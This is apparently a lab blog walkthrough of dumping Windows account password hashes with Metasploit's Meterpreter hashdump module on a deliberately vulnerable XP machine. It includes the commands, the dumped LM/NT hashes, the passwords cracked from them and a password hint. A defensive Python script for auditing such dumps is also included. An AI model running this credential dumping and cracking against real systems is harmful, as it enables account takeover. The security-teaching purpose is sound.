Metasploit Meterpreter: Dumping Username and Password Hashes – hashdump

This follows on from a previous post in which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

And so to the Meterpreter:

meterpreter > use priv    <- to run as a privileged account
[-] The 'priv' extension has already been loaded.
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hints…

No users with password hints on this system

[*] Dumping password hashes…
Administrator:500:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:6b07ba3b4d75aa51838b0cfdc86c8df3:e45fffac3de66133d18d22904c5826cf:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0eed33aba5c1d0b4380877fc6a9d3782:::
Lab1:1003:120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6:::
IUSR_LAB:1004:62370555cf8f248a0e09beb9498d8aef:e3f63f5c44a2d1b51f41605f8b393f9a:::
IWAM_LAB:1005:f36ec01c239defaaf55c7c89733523b1:5a0701b3aada738fcca9bec7d5de30a5:::
ASPNET:1006:7287a164a7e06a495f8d3fe3df15c6f4:44919150091298dd9585de0e598750a2:::
__vmware_user__:1013:aad3b435b51404eeaad3b435b51404ee:bb971f73d6fd552502d31ee0ba49d197:::

A hash (or LM hash half) beginning aad3b435 is the hash of an empty string.
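As an added example (not from the original post), here is a small defender-side audit of pwdump-format lines like those above: it parses each line, flags accounts whose LM hash is still being stored (which means NoLMHash is not enforced, and whose second half tells you whether the password is at most 7 characters), flags blank passwords via the empty NT hash, and flags NT hashes shared between accounts. The sample input reuses four lines from the dump above plus one constructed "svc_backup" line added to show password reuse.

```python
import re

# Each LM half is DES("KGS!@#$%") keyed by 7 password bytes, so a null half is
# aad3b435b51404ee; the NT hash of the empty password is MD4 of an empty
# UTF-16LE string. Both values appear in the dump above.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Lines taken from the hashdump output above (pwdump format user:rid:lm:nt:::),
# plus one constructed "svc_backup" account that shares Lab1's NT hash.
SAMPLE_DUMP = """\
Administrator:500:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0eed33aba5c1d0b4380877fc6a9d3782:::
Lab1:1003:120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6:::
svc_backup:1100:aad3b435b51404eeaad3b435b51404ee:e653e6452753c97e46792567dff599b6:::
"""

PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)

def parse_line(line: str) -> dict:
    """Split one pwdump line into its fields; hashes are normalised to lowercase."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a pwdump line: {line!r}")
    return {"user": m[1], "rid": int(m[2]), "lm": m[3].lower(), "nt": m[4].lower()}

def audit_dump(text: str) -> dict:
    """Return {user: [issues]} for every account in a pwdump-format dump."""
    accounts = [parse_line(l) for l in text.splitlines() if l.strip()]
    by_nt = {}
    for a in accounts:
        by_nt.setdefault(a["nt"], []).append(a["user"])
    report = {}
    for a in accounts:
        issues = []
        if a["nt"] == EMPTY_NT:
            issues.append("blank password")
        if a["lm"] != EMPTY_LM:
            # An LM hash is present, so NoLMHash is not enforced on this host; a null
            # second half means the password fits in the first 7-byte DES key.
            length = "1-7 chars" if a["lm"][16:] == EMPTY_LM_HALF else "8-14 chars"
            issues.append(f"LM hash stored (password is {length})")
        # Identical NT hashes mean identical passwords: reuse across accounts.
        others = sorted(u for u in by_nt[a["nt"]] if u != a["user"])
        if others and a["nt"] != EMPTY_NT:
            issues.append("password shared with " + ", ".join(others))
        report[a["user"]] = issues
    return report
```

Running `audit_dump(SAMPLE_DUMP)` reports the Administrator password as at most 7 characters and Lab1's as 8 to 14, which matches the 6- and 8-character passwords the post recovers.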

I copied the Administrator's Windows LAN Manager (LM) password hash (81cbcea8a9af93bbaad3b435b51404ee) and decrypted it, and was rewarded with “S3CR3T”, which is indeed the correct password!

I did the same as above with the Lab1 LM hash (120fafeb2e7c7e58944e2df489a880e4) on a different website, as the first website was unable to decrypt it, and again was rewarded with “WHATEVER”, which is the correct password.

Interestingly, when I entered the second password hash (NTLM) of Lab1 (e653e6452753c97e46792567dff599b6), the first website decrypted it fine.

In the output above it’s noted: “No users with password hints on this system” and so I set a “hint” and reran the scan:

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hints…

Lab1:"My feet smell"

And there's the password hint: “My feet smell”
